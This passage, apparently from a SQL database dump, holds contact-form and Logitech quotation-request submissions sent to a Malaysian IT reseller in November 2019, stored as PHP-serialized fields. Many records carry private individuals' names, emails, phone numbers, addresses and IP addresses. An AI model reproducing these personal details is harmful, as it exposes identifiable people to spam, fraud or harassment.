bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Jalan BS 5/29\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Rally\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"28\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-11-05 16:17:02','121.122.86.26','1'),(358,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Prabhavathi A\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"sharon.89p@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"08778029284\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"indira ivf hospital\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:36:\"I would like to work in your company\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-11-05 19:49:44','45.126.255.67','1'),(359,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"Aaron Soh\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"aaron@sindoh.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0192939918\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Sindoh Malaysia\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:93:\"Keen to explore further on the possibility to collaborate, particularly Kofax&#039;s products\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"99\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-11-06 08:49:31','175.144.36.207','1'),(360,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"Mohd Ezuddin Hasbullah\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"ezuddin@transfocus.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0163357457\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:30:\"TransNusantara Network Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:97:\"Sublot 5, 2nd &amp; 3rd Floor, Setia Commercial Centre, Jalan Setia Raja, 93350 Kuching, Sarawak.\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:42:\"Would like to request for a quotation . Tq\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-11-06 15:56:10','120.50.55.254','1'),(361,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"Mohd Fazlin b Zainal\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"fazlin@nahrim.gov.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0122068155\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:60:\"Institut Penyelidikan Hidraulik Kebangsaan Malaysia (NAHRIM)\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:268:\"Boleh berikan kami sebutharga untuk komputer Panasonic Toughbook Model CF-54 FULL HD (- IntelÂ® Coreâ„¢ i7-7600U Processor - Windows 10 Pro - 14&quot; IPS Full HD (1920 Ã—1080 pixels) - 16GB RAM and 512GB SSD - 3x USB 3.0, 1x HDMI, 1x LAN and SD card slot as standard)\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-11-07 09:00:38','42.153.150.237','1'),(362,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:9:\"NATHANIEL\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"nathaniel.ceec@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60362064323\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:39:\"CEEC TIANJIN ELECTRIC POWER (M) SDN BHD\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"LOOKING FOR NAS SYSTEM\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-11-07 12:37:47','110.159.139.55','1'),(363,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Joehary Ismail\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"joehary@whssb.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0198511717\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:5:\"WHSSB\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:47:\"Sadong Jaya, Karamunsing, Kota Kinabalu, Sabah.\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Logitech MeetUp\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:35:\"Video conferencing for small office\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"23\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-11-08 15:36:34','103.14.184.26','1'),(364,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"manoj mv krishnan nair\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:33:\"manoj.nair@globalindianschool.org\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0122689947\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:34:\"GLOBAL INDIAN INTERNATIONAL SCHOOL\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:84:\"242 LORONG ABDUL SAMAD OFF JALAN SULTAN ABDUL SAMAD, BRICKFIELDS, 50470 KUALA LUMPUR\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:62:\"Logitech Connect, SmartDock Extender Box, Group Expansion Mics\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-11-11 07:41:55','115.132.104.9','1'),(365,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"Mohd Al Iman Zakaria\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:18:\"hello@datakraf.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"+60162021666\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company 